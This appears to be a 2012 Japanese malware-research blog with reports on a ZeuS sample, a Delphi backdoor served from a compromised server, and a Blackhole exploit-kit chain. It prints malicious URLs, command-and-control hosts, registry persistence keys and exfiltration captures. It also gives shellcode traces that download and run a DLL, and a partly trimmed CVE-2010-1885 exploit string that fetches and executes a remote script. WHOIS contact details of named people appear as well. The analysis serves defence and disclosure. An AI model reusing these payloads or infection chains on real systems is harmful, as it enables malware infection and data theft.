   OriginalFilename: DFDWiz.exe
6. Suspicious Marks:
   0x444de8 GetCurrentProcess //Antidebug
   0x444ed0 IsDebuggerPresent
   0x444f08 GetProcAddress
   0x445068 LoadLibraryA
   0x444c98 CreateFileA  //Malware File Activities
   0x444e2c SetFileAttributesA
   0x444fe8 CreateProcessA
   0x444ce8 VirtualAllocEx  //System Hook 
   0x444e34 VirtualProtectEx
   0x4451dc SetClipboardData //Clipboard hook
   0x445144 GetKeyState  //Keyboard Hook (keylogger)
   0x445438 GetAsyncKeyState
   0x444d3c VirtualAlloc //DEP violation
   0x444d68 SetSystemTime //Privilage Escalation Traces
   0x444e7c ReadProcessMemory
   0x444f24 Process32Next //Process Enumeration call
7. Many oher suspicious calls in DLL list --> [HERE]
8. First bytes reversing to ASM is [HERE] 
■マルウェアの行動分析調査

下記のファイルを保存されました↓

%AppData%\Anzaas\modix.exe 0ef3c938fa0859414a2f0debfd714c5a 305,704 bytes
%AppData%\obus.ehb         0d1c75f3690f07c4029da91f756fa503 1,322 bytes
%Temp%\tmpafa30c81.bat     887cd36aa4a6f4a12336e3fbe10faae4 168 bytes 
■ドロップされたバイナリーの形は↓



File name:       modix.exe
MD5:             2378802f2bf2406908f3b3013edd8f47
File size:       298.5 KB ( 305704 bytes )
File type:       Win32 EXE
Detection ratio: 8 / 42
Analysis date:   2012-04-10 15:27:00 UTC
Scan Result:     [CLICK]
※ようするに、元のバイナリーと同じ形、ですが、MD5が違います。
 マルウェアのPolymorphic(SIGNATURE変更)の技術を使っているそうですね。ZeuSの【注意】点!
■下記の順番でプロセスが立ち上がりました↓

サンプル (MODIX.EXEにコピーしregistryに自動起動の登録して、プロセス終了)
  |
  +---modix.exe (ALIVE)
        |
        +---cmd.exe (ALIVE)
               |
               +---Explorer.exe (ALIVE) 
■レジストリーの変更を発見↓

//マルウェアUIDと登録
[HKEY_CURRENT_USER\Identities]
   Identity Login = 0x00098053

//Cookieクリーンアップ
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy]
   CleanCookies = 0x00000000

//ZeuSトロイマルウェア自動実行設定
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
   {3DFA1AE4-115C-AD7B-A6BA-A75086AF8442} = ""%AppData%\Anzaas\modix.exe""

//インターネットZoneをクリーンアップ
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    1609 = ""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
    1406 = ""
    1609 = ""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
    1609 = ""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    1406 = ""
    1609 = ""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
    1406 = ""
    1609 = "" 
■キーロガー機能を発見↓

VK_LBUTTON (1)      18  
■下記のMUTEXを発見↓

Global\{370A7816-​AFFD-​2A8F-​E811-​5333C5ED7021}
Global\{3BE6AF24-​78CF-​2663-​E811-​5333C5ED7021}
■感染されたサーバの情報↓

inetnum: 219.94.128.0 - 219.94.255.255
netname: SAKURA-OSAKA
descr: SAKURA Internet Inc.
descr: 1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country: JP

inetnum: 112.78.112.0 - 112.78.127.255
netname: SAKURA-OSAKA
descr: SAKURA Internet Inc.
descr: 1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country: JP

注意点:上記のIPに沢山.RUと.SUドメインが登録されています!
本件の感染は日本のSAKURAインターネットルート/「AS9371」です↓↓



a. [JPNICハンドル]              KW419JP
b. [氏名]                       鷲北 賢
c. [Last, First]                Washikita, Ken
d. [電子メイル]                 north-nic@sakura.ad.jp
f. [組織名]                     さくらインターネット株式会社
g. [Organization]               SAKURA Internet Inc.
k. [部署]                       技術部
l. [Division]                   Technical Department
m. [肩書]                       部長
n. [Title]                      Director
o. [電話番号]                   +81-6-6265-4830
p. [FAX番号]                    +81-6-6265-4834
y. [通知アドレス]               jpnic-staff@sakura.ad.jp
[最終更新]                      2007/05/23 12:11:07(JST)
                                db-staff@nic.ad.jp
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 8:49 午後 0 comments

月曜日, 4月 09, 2012

#OCJP-036:KDDIネットワーク「kaigaifudosan.jp / 115.146.17.174」サーバが中国で作ったスパイウェア・バックドアを発見! 【対応最中】


今回の発見した物はスパイウェアです。恐らくAPT経由マルウェアですね。よく作ってくれたマルウェアですので、本スパイウェアの目的はバックドアと情報を盗む事です。発見されたマシンも企業向けのサーバですので、かなり危険だと思います。
さて、詳細な情報は下記となりますので、御確認下さい↓
■感染されたサーバ↓

kaigaifudosan.jp / 115.146.17.174
■感染されたURLとサーバの情報↓

hxxp://kaigaifudosan.jp/bac/install_flash_player.exe
hxxp://www.kaigaifudosan.jp/bac/install_flash_player.exe
サーバ情報↓

Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 01 Dec 2011 13:39:24 GMT
ETag: "2e90006-b7400-fafefb00"
Accept-Ranges: bytes
Content-Length: 750592
X-Powered-By: PleskLin
■ダウンロード証拠↓(アップされている状況の証拠)

--15:11:11--  hxxp://www.kaigaifudosan.jp/bac/install_flash_player.exe
           => `install_flash_player.exe'
Resolving www.kaigaifudosan.jp... 115.146.17.174
Connecting to www.kaigaifudosan.jp|115.146.17.174|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 750,592 (733K) [application/octet-stream]
100%[====================================>] 750,592        1.13M/s
15:11:12 (1.13 MB/s) - `install_flash_player.exe' saved [750592/750592]

--15:11:28--  hxxp://kaigaifudosan.jp/bac/install_flash_player.exe
           => `install_flash_player.exe'
Resolving kaigaifudosan.jp... 115.146.17.174
Connecting to kaigaifudosan.jp|115.146.17.174|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 750,592 (733K) [application/octet-stream]
100%[====================================>] 750,592        1.11M/s
15:11:28 (1.11 MB/s) - `install_flash_player.exe' saved [750592/750592]
■マルウェアファイルの見た目↓

-rwx------ 1 750,592 Dec 1 04:39 install_flash_player.exe 5f23dc023ef8160005927368c4740756
アイコンとプロパーティを見るとこんな感じですね↓

■ウイルススキャン結果↓

File name:       install_flash_player.exe
MD5:             b2bf8758daf70fcf11deac8952f77bab
File size:       733.0 KB ( 750592 bytes )
File type:       Win32 EXE
Detection ratio: 38 / 42
Analysis date:   2012-04-08 09:41:56 UTC
Detection:       [CLICK]
■マルウェア情報↓

アファイル  :「install_flash_player.exe」又は「02ec2b58b9.exe」
マルウェア種類: Win32/トロイ・ドロッパー&バックドアー
マルウェア名 : Win32/Delf/Siscos/Backdoor、など
マルウェア機能: ドロッパー、バックドアー、キーロガー、メモリ・キャップチャー
説明     : 感染されたパソコンにboot.exeマルウェアをドロップされて実行されて、
                 リモートマシンに繋ぎます。情報が外から取れるし、送信も可能になります。
■マルウェア調査↓

1. はじめに、ファイルの見た目についてのトリック…
ウイルス・スキャナーソフトを使うとこのマルウェアファイルがPEファイルと判断されますが、
実はPE EXEファイルです。例えば下記のA社のウイルススキャン結果↓

Win32 Executable Generic (58.3%)
Win16/32 Executable Delphi generic (14.1%)
Generic Win/DOS Executable (13.7%)
DOS Executable Generic (13.6%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
又はウイルストータルの結果↓

File type:       Win32 EXE
もっと詳しく確認では↓

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2011:02:18 12:13:48+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 584192
LinkerVersion............: 2.25
EntryPoint...............: 0x8e85c
InitializedDataSize......: 165376
SubsystemVersion.........: 4.0
ImageVersion.............: 0.0
OSVersion................: 4.0
UninitializedDataSize....: 0 
実はアーカイブファイル(PE EXE)で、Borland Delphiでコンパイルされた物です。
証拠は、ファイルの見た目の所に見て頂ければ分かります。
アーカイブの中身のスナップショットも取りました。

PEファイルのSTRUCTUREはこんな感じです↓

.text        4096     576940    577024     6.45  befce8df61e75abc611eff8a562db086
.itext     581632       6820      7168     5.87  b2358b3469f00ec5cf4e8c10abfe57cc
.data      589824      11028     11264     4.50  5bd510e51a7455be7cfc7df32d2bcd33
.bss       602112      48088         0     0.00  d41d8cd98f00b204e9800998ecf8427e
.idata     651264      16756     16896     5.22  4d6fdcdef9d78641e232a72c93952379
.tls       671744         52         0     0.00  d41d8cd98f00b204e9800998ecf8427e
.rdata     675840         24       512     0.21  e7bf35a9e7f2a444fc253cef81fd1c98
.reloc     679936      35196     35328     6.75  c400aab1f3e4609c07abac25c12c65a7
.rsrc      716800     101348    101376     4.58  5ff200a6919943f77748e85eaf50e152
2. バイナリー調査

2011年2月18日に作った物が分かりました↓
0x4D5E546C [Fri Feb 18 11:13:48 2011 UTC]

ライブラリーを確認したら下記のDLLがロードされます↓

oleaut32.dll   advapi32.dll   user32.dll     kernel32.dll
kernel32.dll   user32.dll     gdi32.dll      version.dll
kernel32.dll   advapi32.dll   wsock32.dll    kernel32.dll
shell32.dll    oleaut32.dll   ole32.dll      URLMON.DLL
oleaut32.dll   comctl32.dll   wininet.dll    shell32.dll
winmm.dll      rasapi32.dll   shell32.dll    advapi32.dll
shell32.dll    advapi32.dll   netapi32.dll   gdiplus.dll    
advapi32.dll   ntdll.dll      netapi32.dll   AVICAP32.DLL
SHFolder.dll   WS2_32.DLL     msacm32.dll    ole32.dll
pstorec.dll    ole32.dll      URL.DLL        SHELL32.DLL
AVICAP32.DLL
このDLLの使った機能を分散したら→【CLICK】
その中に一番あやしいコールはこちら→【CLICK】

はっきり、バイナリー調査結果はそれだけです、packer/crypterを使わないマルウェア(非常に珍しい)
それとも、Anti-Reversing技術も使ってない(もっと珍しい)
上記のDLLとコール情報を見ると色んなマルウェア機能を発見しました。

沢山マルウェアを調査したが、色んな種類マルウェアを見たら、中々完璧に作られた物が無いですね、
大体こんな感じ→①コードを急いで書いたか、②あちこちからの物を使うか、③必ず隠す方法を使う、ですが、
本サンプルを見たら、よーく考えて作った物で、いいプログラマーが開発された物だと思われます、
さらに、あの人がマルウェア開発の権限が無いのプログラマーです。
これを考えると、次の質問は”何故?”になるので、 頼まれたから作ったのかなぁ?と考えています。
この考えが当たると本件のマルウェアは「APT」のマルウェア可能性が出ますね。
3. 行動分析調査

3.1. 下記のファイルをパソコンに保存されます↓

C:\WINDOWS\boot.exe boot.exe 
    819,200 bytes 
    5f23dc023ef8160005927368c4740756
※)このバイナリーは本マルウェアのPAYLOADです。
3.2. そして、レジストリーに下記の様に追加されました↓

HKEY_CURRENT_USER\Software\DC3_FEXEC

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    winupdater = "%Windir%\boot.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon
   UserInit = "C:\​WINDOWS\system32\userinit.exe,%Windir%\boot.exe"
   
※)パソコンが起動した時又はアップデートした時に本マルウェアのPAYLOADを実行されます。
3.3. そして、本マルウェアは下記のコマンドを実行しました↓

%Windir%\explorer.exe       shellコマンドライン "C:\WINDOWS\explorer.exe"
%Windir%\system32\ping.exe shellコマンドライン "ping 127.0.0.1 -n 5 > NUL del "C:\02ec2b58b9.exe" "
 ↑メモリー調査でshellのコマンドは上記になったと間違いないですが、
  ↑本コマンド”ping”を実行されたら必ずエラーになりますね。。。
%Windir%\boot.exe           shellコマンドライン "%Windir%\boot.exe"
その後は本マルウェアのプロセスが終了です。
3.4. ネットワーク動き↓

すべてマルウェアのネットワーク動きはexplorer.exeからです↓

UDP (DNS) REQUESTS:
savas123.dyndns.org / 78.168.96.181

TCP CONNECTION ATTEMPTS:   
from localhost:1032 to 78.168.96.181:81
from localhost:1028 to 78.168.96.181:81
from localhost:4048 to 78.168.96.181:81
from localhost:ランダム to 78.168.96.181:81 
↑パケットキャップチャーをしたらDNSとSYN/ACKの動きはこんな感じ↓


↑繋がったら下記のCMDのSHELLで確認が出来ました↓



送信されたデータをキャップチャーしたら下記となります↓

00000000 | 4B45 4550 414C 4956 4539 3936 3430 4B45 | KEEPALIVE99640KE
00000010 | 4550 414C 4956 4531 3030 3634 304B 4545 | EPALIVE100640KEE
00000020 | 5041 4C49 5645 3130 3136 3430 4B45 4550 | PALIVE101640KEEP
00000030 | 414C 4956 4531 3032 3634 304B 4545 5041 | ALIVE102640KEEPA
00000040 | 4C49 5645 3130 3336 3430 4B45 4550 414C | LIVE103640KEEPAL
00000050 | 4956 4531 3034 3634 304B 4545 5041 4C49 | IVE104640KEEPALI
00000060 | 5645 3130 3536 3430 4B45 4550 414C 4956 | VE105640KEEPALIV
00000070 | 4531 3036 3634 304B 4545 5041 4C49 5645 | E106640KEEPALIVE
00000080 | 3130 3736 3430 4B45 4550 414C 4956 4531 | 107640KEEPALIVE1
00000090 | 3038 3634 30                            | 08640
キーロガー機能↓

user32.dll.GetKeyboardType Hint[0]
user32.dll.LoadKeyboardLayoutA Hint[0]
user32.dll.GetKeyboardState Hint[0]
user32.dll.GetKeyboardLayoutNameA Hint[0]
user32.dll.GetKeyboardLayoutList Hint[0]
user32.dll.GetKeyboardLayout Hint[0]
user32.dll.ActivateKeyboardLayout Hint[0]
メモリー/CLIPBOARDキャップチャー機能↓

user32.dll.SetClipboardData Hint[0]
user32.dll.RegisterClipboardFormatA Hint[0]
user32.dll.OpenClipboard Hint[0]
user32.dll.IsClipboardFormatAvailable Hint[0]
user32.dll.GetClipboardData Hint[0]
user32.dll.EnumClipboardFormats Hint[0]
user32.dll.EmptyClipboard Hint[0]
user32.dll.CloseClipboard Hint[0]
4. 本マルウェアの情報調査↓

boot.exeの感染事件がThreatExpertで見ればレポートが多いですね↓

↑詳しく見れば中国からの感染事件が多いです。
■感染されたサーバの登録情報(手続きの為に)

IP:                             115.146.17.174
inetnum:                        115.146.16.0 - 115.146.31.255
netname:                        CPI-NET
descr:                          KDDI Web Communications Inc.
country:                        JP
admin-c:                        YM12747JP
tech-c:                         YM12747JP
a. [JPNICハンドル]              YM12747JP
b. [氏名]                       森川 慶彦
c. [Last, First]                Morikawa, Yoshihiko
d. [電子メイル]                 tech@cpi.ad.jp
f. [組織名]                     株式会社KDDIウェブコミュニケーションズ
g. [Organization]               KDDI Web Communications Inc.
o. [電話番号]                   03-3238-5783
p. [FAX番号]                    03-3238-5781

[Domain Name]                   KAIGAIFUDOSAN.JP
[Registrant]                    Amanda Fulton
[Name]                          Amanda Fulton
[Email]                         amanda.fulton()arena-kk.com
[Postal code]                   166-0002
[Postal Address]                3-43-13 Koenji-kita
                                Suginami-ku
                                Tokyo
[Phone]                         81353578387

インターネット&ルーティング情報↓
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 6:53 午後 0 comments

水曜日, 4月 04, 2012

#OCJP-035: 「hirochan.boo.jp/210.172.144.77」ウェブサーバ(GMO/IDC)が4月3日作られたBlackHole経由ZeuSマルウェアに感染されました。


今回はまたBlackhole Exploit Packに感染された日本のサーバの件です。感染されたURLからZeuS/ZBotトロイ(ドロッパー/ダウンローダー/キーロガー/スパイウェア機能持っているマルウェア)がダウンロードされます。
本件のZeuS感染仕組み既に#OCJP-031 Backhole/ZeuS事件に似ていますが、今回はもっと複雑になってきました。
分かりやすいように本件の感染仕組みは下記のグラフに書きました↓

さて、詳細な情報は下記のレポートをご覧下さい。
■下記のサービス↓

hirochan.boo.jp / 210.172.144.77 
■下記のURLに↓

hxxp://hirochan.boo.jp/7PMiDL3p/js.js 
■下記のマルウェアを発見しました↓

アファイル  :「js.js」
マルウェア種類: Blackhole JavaScript Trojan REDIRECTOR (ZeuS感染仕組み)
マルウェア名 : JS.BlacoleRedir Trojan.JS.Agent など
マルウェア機能: マルウェアサイトのJavascriptをダウンロードと実行されます、
説明     : 本件のサンプルではBLACKHOLE EXPLOIT PACKから感染されたURLです。
                 クリックしてしまうとマルウェアサイトへ飛ばされて、
                 マルウェアがダウンロードされます 
■ダウンロード証拠↓

--23:16:00--  hxxp://hirochan.boo.jp/7PMiDL3p/js.js
           => `js.js'
Resolving hirochan.boo.jp... 210.172.144.77
Connecting to hirochan.boo.jp|210.172.144.77|:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: 75 [application/x-javascript]
100%[====================================>] 75            --.--K/s
23:16:00 (2.70 MB/s) - `js.js' saved [75/75]
■ファイルの中身↓

$ cat js.js

document.location='hxxp://174.140.171.100/showthread.php?t=d7ad916d1c0396ff'; 
■ウイルススキャン結果↓

MD5:              1f9a80914c558b15db7d963b285376de
File size:        75 バイト ( 75 bytes )
File name:        js.js
File type:        JavaScript/Text
Detection ratio:  3 / 40
Analysis date: 	  2012-04-03 18:14:30 UTC
Detection Result: [CLICK]
■マルウェア調査結果↓

1. サマリー
本件の事件の感染URLをクリックすると下記のファイルの順番通りでダウンロードされます。
全てマルウェアファイルです↓

js.js                               1f9a80914c558b15db7d963b285376de [Scan]
showthread.php@t=d7ad916d1c0396ff   04a638d5e7b646fb68b9a931b9c358b4 [Scan]
q.php@f=ba33e                       c3e5699e9a715b28b54b7850b6610e7a [Scan]
showthread.php@t=d7ad916d1c0396ff.1 57ff339f064f9d42266c7907769e39c1 [Scan]
ap2.php@f=ba33e                     2e7c99f0098753dae55d6eaf59447978 [Scan]
q.php@f=14095                       d025064d50c23c46af1d3f85c1ab780c [Scan]
2. ファイルの情報
見た目では全部テキストファイルですが、最後の2つは実はバイナリーファイルです。
ファイルの見た目はこんな感じです↓


3. リストをすると下記のようになります↓

-rwx------        75 Apr  3 04:00 js.js
-rwx------     18421 Apr  3 05:17 showthread.php@t=d7ad916d1c0396ff
-rwx------     95272 Apr  3 05:29 q.php@f=ba33e
-rwx------     16896 Apr  3 05:24 showthread.php@t=d7ad916d1c0396ff.1
-rwx------     14577 Apr  3 05:23 ap2.php@f=ba33e
-rwx------    296488 Apr  3 06:43 q.php@f=14095
4. それぞれのマルウェアの調査に付いて↓

4.1. js.js

$ cat js.js
document.location='hxxp://174.140.171.100/showthread.php?t=d7ad916d1c0396ff';
4.2. showthread.php@t=d7ad916d1c0396ff

>
--23:17:07--  hxxp://109.202.98.43/showthread.php?t=d7ad916d1c0396ff
           => `showthread.php@t=d7ad916d1c0396ff'
Connecting to 109.202.98.43:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [  <=>                                ] 18,421        67.72K/s
23:17:09 (67.58 KB/s) - `showthread.php@t=d7ad916d1c0396ff' saved [18421]
中身は↓



上記のファイルをクラックしたら下記の2件の脆弱性が入っています↓

Name    Description	   Reference
Adobe   Libtiff	           Acrobat Libtiff integer overflow CVE-2010-0188
HPC/URL	Help Center URL    Validation Vulnerability         CVE-2010-1885
その脆弱性は順番通りで下記のshellcodeに入っています↓





↑上記のshellcodeをクラックしたら順番通りで下記の結果が出ます↓

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, 
           [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, 
           szURL=http://109.202.98.43/q.php?f=ba33e&e=4, lpfnCB=0x0, 
           szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, 
           uCmdShow=0)
0x7c86250d kernel32.WinExec(
           lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, 
           uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
↑と↓

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, 
           [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, 
           szURL=http://109.202.98.43/q.php?f=ba33e&e=1, lpfnCB=0x0, 
           szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(
           lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(
           lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, 
           uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
↑これで下記のダウンロードがあると確認が出来ました↓

hxxp://109.202.98.43/q.php?f=ba33e&e=4
hxxp://109.202.98.43/q.php?f=ba33e&e=1 
ダウンロードが出来たら下記のファイルに保存されます↓

C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll
そして下記のregistryコマンドでパソコンのレジストリーに登録されます↓

regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll


メモ、上記のCVE-2010-1885(HCP/URL)脆弱性Exploitは下記となります↓

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%....//わざっとカットしました//....A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<s c r i p t  defer>e v a l (Run(String.fromChar
Code(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,11
6,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,
72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47
      ....//わざっとカットしました//....
,49,48,57,46,50,48,50,46,57,56,46,52,51,47,100,97,116,97,47,104,99,112,95,118,98,115,46
,112,104,112,63,102,61,98,97,51,51,101,38,100,61,48,34,44,102,97,108,115,101,58,46,115,10
1,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,
40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,10
6,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,1
      ....//わざっとカットしました//....
05,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,3
2,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,
115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,11
1,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
      ....//わざっとカットしました//....
,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,1
11,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,9
2,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116
,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120
,101)));</s c r i p t>
実はこの証拠を調査した時にもう一つURLが発見しました
hxxp://109.202.98.43/data/ap2.php?f=ba33e

本件は上記の保存されたファイルですが実は同じバイナリーです↓

--23:23:37--  hxxp://109.202.98.43/data/ap2.php?f=ba33e
           => `ap2.php@f=ba33e'
Connecting to 109.202.98.43:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: 14,577 (14K) [application/pdf]
100%[====================================>] 14,577        53.32K/s
23:23:38 (53.21 KB/s) - `ap2.php@f=ba33e' saved [14577/14577]
↑これはまた複雑なJAVASCRIPTです、上記のダウンロードされるファイルは実はPDFファイルです。
見た目は(クリックしたらテクストのバーションが見れます)


↑これをクラックしたら下記shellcodeが出ます↓



↑またCVE-2010-0188脆弱性のEXPLOITっぽいですね、APIで確認したら
同じく「wpbt0.dll」のダウンローダーです。
これを見ると必ず「wpbt0.dll」がダウンロードされるように色んな方法を使われたみたいですね。

APIは↓

0x7c801ad9	kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)	1
0x7c801d7b	kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa	kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, 
        [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])	
0x1a494bbe	urlmon.URLDownloadToFileA(pCaller=0, 
        szURL=http://109.202.98.43/q.php?f=ba33e&e=4, lpfnCB=0x0, 
        szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)	0
0x7c86250d	kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, 
        uCmdShow=0)	
0x7c86250d	kernel32.WinExec(
        lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c81cb3b	kernel32.TerminateThread(dwExitCode=0)
では、続きましょう!↓

4.3. 「wpbt0.dll」

本ファイルはトロイのマルウェアのバイナリーファイルです。
スナップショットでは↓


本件のマルウェアは4月3日にコンパイルされたマルウェアです、証拠↓
0x4F7B02BC [Tue Apr 03 14:01:32 2012 UTC]

実行されたら下記動きを発見↓

・wpbt0.dllプロセスが違うサイズでメモリーにインジェクトされました↓
    PID TTY     STIME COMMAND
    1012  0  10:04:56 wpbt0.dll (57,344 bytes)
・レギストリーにマルウェアの暗号鍵を保存↓
   [HKEY_CURRENT_USER\Software\WinRAR]
    HWID = 7B 41 39 44 31 42 39 36 36 2D 30 41 31 32 2D 34 35 46 32 
           2D 42 35 45 44 2D 34 44 39 31 30 31 30 39 36 31 42 34 7D
・バックドアポートが開きました↓
    1034	TCP
・下記のホストにDNS依頼を発見↓
   91.121.178.156
   subdatapro.com
・TCP/8080とTCP/8008に下記の接続を発見↓
   91.121.178.156	8080
   subdatapro.com	8008
・パソコンからの情報を送信されます。パケットキャップチャー↓

ポート8080↓
00000000 | 504F 5354 202F 706F 6E79 2F67 6174 652E | POST /pony/gate.
00000010 | 7068 7020 4854 5450 2F31 2E30 0D0A 486F | php hxxp/1.0..Ho
00000020 | 7374 3A20 3931 2E31 3231 2E31 3738 2E31 | st: 91.121.178.1
00000030 | 3536 0D0A 4163 6365 7074 3A20 2A2F 2A0D | 56..Accept: */*.
00000040 | 0A41 6363 6570 742D 456E 636F 6469 6E67 | .Accept-Encoding
00000050 | 3A20 6964 656E 7469 7479 2C20 2A3B 713D | : identity, *;q=
00000060 | 300D 0A43 6F6E 7465 6E74 2D4C 656E 6774 | 0..Content-Lengt
00000070 | 683A 2031 3931 0D0A 436F 6E6E 6563 7469 | h: 191..Connecti
00000080 | 6F6E 3A20 636C 6F73 650D 0A43 6F6E 7465 | on: close..Conte
00000090 | 6E74 2D54 7970 653A 2061 7070 6C69 6361 | nt-Type: applica
000000A0 | 7469 6F6E 2F6F 6374 6574 2D73 7472 6561 | tion/octet-strea
000000B0 | 6D0D 0A43 6F6E 7465 6E74 2D45 6E63 6F64 | m..Content-Encod
000000C0 | 696E 673A 2062 696E 6172 790D 0A55 7365 | ing: binary..Use
000000D0 | 722D 4167 656E 743A 204D 6F7A 696C 6C61 | r-Agent: Mozilla
000000E0 | 2F34 2E30 2028 636F 6D70 6174 6962 6C65 | /4.0 (compatible
000000F0 | 3B20 4D53 4945 2035 2E30 3B20 5769 6E64 | ; MSIE 5.0; Wind
00000100 | 6F77 7320 3938 290D 0A0D 0A43 5259 5054 | ows 98)....CRYPT
00000110 | 4544 3094 8E01 19A5 3F45 D2ED 2B1D AB7F | ED0.....?E..+...
00000120 | 58CA 51C0 C0AA 4DFF E41F A0D5 69D6 86B8 | X.Q...M.....i...
00000130 | 1866 7898 C311 9146 8568 375A 430F D4DC | .fx....F.h7ZC...
00000140 | ED14 32F0 2E42 E8DC 2ADA B141 10C5 A541 | ..2..B..*..A...A
00000150 | 60B8 B2C6 5B79 E3F5 A6BD CACA 9559 E8EA | `...[y.......Y..
00000160 | 5CD1 0A23 8263 DC3C 48A7 D320 5C75 1482 | \..#.c.<H.. \u..
00000170 | 5A44 CC20 5F4D 407A 7A27 E589 9BF6 37BE | ZD. _M@zz'....7.
